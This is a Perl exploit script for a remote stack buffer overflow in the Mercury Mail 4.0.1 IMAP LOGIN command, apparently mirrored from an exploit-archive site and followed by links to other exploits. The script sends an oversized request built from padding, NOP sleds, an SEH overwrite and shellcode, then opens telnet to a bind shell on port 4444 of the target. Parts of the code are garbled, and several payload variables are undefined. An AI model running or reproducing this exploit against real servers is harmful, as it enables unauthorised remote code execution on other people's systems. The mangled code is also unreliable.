#!/usr/bin/perl
#
# http://www.securityfocus.com/bid/11775
# credit to Muts for this vulnerability
# acaro [at] jervus.it
use IO::Socket::INET;
use Switch;
if (@ARGV new(proto=>'tcp', PeerAddr=>$host, PeerPort=>$port);
$socket or die "Cannot connect to host!n";
recv($socket, $reply, 1024, 0);
print "Response:" . $reply;
send $socket, $request, 0;
print "[ ] Sent 1st requestn";
recv($socket, $reply, 1024, 0);
print "Response:" . $reply;
sleep(1);
my $request ="x41" x 255;
send $socket, $request, 0;
print "[ ] Sent 2nd requestn";
sleep(1);
my $request=("x45" x7420).("x90" x10).$happy.("x90" x14).$shellcode.("x41" x8).$nextseh.$seh.("x90" x5).$jmp.("x90" x533);
send $socket, $request, 0;
print "[ ] Sent final requestn";
sleep(1);
close($socket);
print " connect on port 4444 of $host ...n";
sleep(3);
system("telnet $host 4444");
exit;
//http://www.leftworld.net
【Mercury Mail 4.0.1 (LOGIN) Remote IMAP Stack Buffer Overflow Exploit】相关文章:
★ VMware Workstation (hcmon.sys 6.0.0.45731) Local DoS Vulnerability
★ Download Accelerator Plus - DAP 8.x m3u File Buffer Overflow Exploit (c)
★ Download Accelerator Plus - DAP 8.x (m3u) Local BOF Exploit 0day
★ IntelliTamper 2.0.7 (html parser) Remote Buffer Overflow Exploit
★ moziloCMS 1.10.1 (download.php) Arbitrary Download File Exploit
★ Discuz! 6.0.1 (searchid) Remote SQL Injection Exploit
★ minb 0.1.0 Remote Code Execution Exploit
★ Debian Sarge Multiple IMAP Server Denial of Service Exploit
★ TGS CMS 0.3.2r2 Remote Code Execution Exploit
★ Yourownbux 4.0 (COOKIE) Authentication Bypass Exploit